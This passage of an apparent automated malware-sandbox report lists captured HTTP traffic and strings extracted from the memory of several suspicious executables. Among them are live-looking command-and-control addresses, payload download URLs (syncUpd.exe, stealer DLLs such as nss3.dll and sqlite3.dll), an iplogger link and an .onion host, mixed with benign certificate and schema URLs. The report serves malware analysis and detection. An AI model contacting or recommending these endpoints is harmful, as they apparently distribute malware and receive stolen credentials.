f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 c0 a2 ca e8 b1 55 84 3a a6 bb 49 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 0e bb e0 47 e4 dc 09 53 e2 f9 de 87 b4 43 d6 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 61 6f c2 75 6e fd 29 2a 93 dc 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 d8 5f 6b 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 f2 84 2d 6e 20 35 03 8d e4 24 bd 70 09 3c 3f 43 1e a8 cb cc 03 dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 0f 01 75 30 4a fe 6b 72 f2 7f b1 0c 73 2b 04 20 6d 42 fd 7a 5d 7a 07 c1 70 dc 66 57 ec fe db d3 cd b1 25 14 9a ee b3 2a 5e 34 51 79 48 ab c4 13 0f e4 4f 26 2a a0 6d 63 2b 4a 73 99 a4 bd 3c 99 0e c9 9c 0b 48 16 13 47 6d b8 76 a0 a6 c0 f1 59 3a b9 46 27 f2 81 da 70 1a 04 19 e5 4c 42 2b fc a0 74 54 f6 04 f8 11 b3 b4 26 c8 b9 27 9c c2 3c 25 59 45 6e d4 49 a6 38 9d c1 5f 05 46 02 35 ad e9 ce 1a 50 46 23 f1 02 ec a4 85 5a 84 40 ab 74 3d 58 4e 75 ee d9 4a 68 1b 03 79 fe ee 2e be bc 68 6a 69 6e 5d 61 03 e2 73 97 6a a9 8e 75 11 68 45 a0 f5 0f f1 e5 85 93 14 ad 8b e8 bb cd 2e 72 c8 f2 8b 55 ff e1 01 48 85 90 1f cf 06 e6 08 7c c1 93 45 83 0e ed e6 c7 8f 60 76 ab 39 18 b2 27 55 72 94 81 c2 55 dc 94 38 db cd 4d ca 84 e2 89 a7 b9 fa ca f1 e0 bf 3e 3c d6 34 47 b8 3a 32 a2 6f 14 7f 4e 0a 9c 60 55 0a 55 98 cc ee 75 90 97 b5 5d 7d 61 3b 4a 82 2b ee cc 67 d3 5b 12 03 14 46 aa 95 f0 bf 81 65 18 30 92 4d fd 61 05 e2 37 36 e8 a6 d0 de 0e e8 a2 a9 3a 7c ab 40 5a 31 b9 89 fd fb a7 be 0f 74 7f fd eb 7e f6 da 8f 3d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:13:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:13:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0

Source: etopt.exe, 00000019.00000003.2425113770.0000000000566000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 00000019.00000003.2425829377.0000000000566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.186.7.211:2001/
Source: etopt.exe, 00000019.00000003.2425113770.0000000000566000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 00000019.00000003.2425829377.0000000000566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.186.7.211:2001/r
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/-core-win32k-fulluser-l1-1-0
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/32k-fulluser-l1-1-0
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exe
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exe2
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exe9
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exeC
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exeJ
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exeSystem32
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exehttps://iplogger.com/19bVA4SOFTWARE
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exej
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exeo
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exeocuZ
Source: nsa984B.tmp.exe, 0000001F.00000002.3077167175.0000000002435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/3886d2276f6914c4.php
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000053E000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: http://5.42.66.58/3886d2276f6914c4.php1b525fcaad4dbf2097b84942422d3b5e5
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/3886d2276f6914c4.phpAwq
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/3886d2276f6914c4.phpE~
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/3886d2276f6914c4.phpK
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/3886d2276f6914c4.phpLIZUSIQEN.xlsx
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/3886d2276f6914c4.phpT
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000053E000.00000040.00000001.01000000.0000001C.sdmp, nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: http://5.42.66.58/3886d2276f6914c4.phpposition:
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/3886d2276f6914c4.phpt
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/freebl3.dll
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/freebl3.dllMO
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/mozglue.dll
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/msvcp140.dll
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/msvcp140.dll;N
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/msvcp140.dllW
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/nss3.dll
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/softokn3.dll
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/softokn3.dll;
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/sqlite3.dllBO1
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/sqlite3.dllWO
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dll
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dll(
Source: nsa984B.tmp.exe, 0000001F.00000002.3074464547.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dllt
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.7/
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.7/dows
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.7/scripts/plus.php?ip=
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, InstallSetup8.exe, 0000000D.00000002.3073092951.000000000073E000.00000004.00000020.00020000.00000000.sdmp, InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.7/scripts/plus.php?ip=212.102.41.2&substr=eight&s=ab
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, InstallSetup8.exe, 0000000D.00000002.3073092951.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/?format=dfg
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/?format=dfg#S
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/?format=dfg/SILENTget1023
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/?format=dfg7S
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/?format=dfg;
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/?format=dfg=S
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/?format=dfgll
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
Source: explorer.exe, 00000001.00000000.1668045299.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1666612825.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2702934288.0000000002A89000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.g
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: explorer.exe, 00000001.00000000.1668045299.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1666612825.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1668045299.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1666612825.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
Source: BroomSetup.exe, 00000010.00000000.2073726210.00000000008CD000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://fontawesome.io
Source: BroomSetup.exe, 00000010.00000000.2073726210.00000000008CD000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://fontawesome.io/license/
Source: BroomSetup.exe, 00000010.00000000.2073726210.00000000008CD000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: http://grub.org)Mozilla/5.0
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)SonyEricssonK550i/R1JD
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://https://_bad_pdb_file.pdb
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://invalidlog.txtlookup
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency
Source: etopt.exe, 00000019.00000002.2809624521.0000000003269000.00000002.00001000.00020000.00000000.sdmp, etopt.exe, 00000019.00000002.2903789358.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://news.qq.com
Source: etopt.exe, etopt.exe, 00000015.00000000.2065294700.000000000040A000.00000008.00000001.01000000.00000011.sdmp, etopt.exe, 00000019.00000000.2073405981.000000000040A000.00000008.00000001.01000000.00000011.sdmp, etopt.exe, 00000019.00000002.2807604369.000000000040A000.00000004.00000001.01000000.00000011.sdmp, etopt.exe, 00000019.00000003.2802420858.000000000058C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: InstallSetup8.exe, 0000000A.00000000.2046905042.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, InstallSetup8.exe, 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmp, InstallSetup8.exe, 0000000D.00000000.2050485003.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, etopt.exe, 00000015.00000000.2065294700.000000000040A000.00000008.00000001.01000000.00000011.sdmp, etopt.exe, 00000019.00000000.2073405981.000000000040A000.00000008.00000001.01000000.00000011.sdmp, etopt.exe, 00000019.00000002.2807604369.000000000040A000.00000004.00000001.01000000.00000011.sdmp, etopt.exe, 00000019.00000003.2802420858.000000000058C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000001.00000000.1668045299.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1666612825.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1666612825.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0AE000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onion
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionhttp://petas4zb2nd4xmyo2bozkq3g
Source: etopt.exe, 00000019.00000002.2809624521.0000000003269000.00000002.00001000.00020000.00000000.sdmp, etopt.exe, 00000019.00000002.2903789358.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pz.hnlyzqjlb.com/mm2/up/http://pz.qishia.com/mm2/up/up2?sid=%u&d=pid=%u&mid=%u&sid=%u&x64=%u&
Source: explorer.exe, 00000001.00000000.1667327220.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1667663651.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1668750135.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: RegSvcs.exe, 00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
